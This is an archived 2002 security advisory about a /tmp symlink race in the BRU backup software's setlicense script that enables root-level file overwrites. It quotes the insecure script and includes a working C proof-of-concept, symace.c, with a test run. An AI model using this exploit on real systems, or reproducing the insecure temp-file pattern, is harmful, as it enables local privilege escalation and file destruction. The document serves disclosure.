29th Jan 2002 [SBWID-5038]
COMMAND
BRU backup software /tmp symlink race condition leads to local root
SYSTEMS AFFECTED
All versions ??
PROBLEM
Andrew Griffiths posted :
The usage of insecure tmp files in some of the various shell scripts,
which allows you to overwrite arbitrary files with foobar. Since this
script would most likely be run by root, it allows you to overwrite any
files you want.
This is the beginnings of the setlicense shell script. For those who
don\'t know, $$ is the current pid of the shell.
#!/bin/sh
printf \"%s\" foobar >/tmp/brutest.$$ 2>&1
res=`cat /tmp/brutest.$$`
rm -f /tmp/brutest.$$
if test \"$res\" != \"foobar\"; then
alias printf=\"echo -n -e\"
fi
So all that needs to be done is create a fair amount of symbolic links
in the temp directory pointing to the file you want to overwrite.
Exploit
=======
/* symace.c -0.0.1 - A generic filesystem symlink/race thinger */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
/* Please note that there is no error checking... */
/* By Andrew Griffiths (nullptr@tasmail.com) */
int main(int argc, char **argv)
{
char *overwrite;
char *base;
int start_pid, end_pid;
int i, size;
overwrite = strdup(argv[1]);
size = strlen(argv[2]) + 8 + 1;
base = malloc(size);
start_pid=atoi(argv[3]);
end_pid=atoi(argv[4]);
for(i=start_pid;i<end_pid;i++) {
memset(base, 0, size-1);
snprintf(base, size-1, \"%s%d\", argv[2], i);
if(symlink(overwrite, base)==-1) {
printf(\"Unable to create %s bailing\\n\", base);
exit(EXIT_FAILURE);
}
}
printf(\"done\\n\");
}
Test Run
========
[andrewg@blackhole src]$ echo hello world > /tmp/hello
[andrewg@blackhole src]$ ./symace /tmp/hello /tmp/brutest. 12037 13000
done
On another terminal:
[andrewg@blackhole x86-linux-glibc2.1]$ ./setlicense
./setlicense: cd: /bru: No such file or directory
/bru does not exist. BRU may not be installed.
SOLUTION
None yet.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
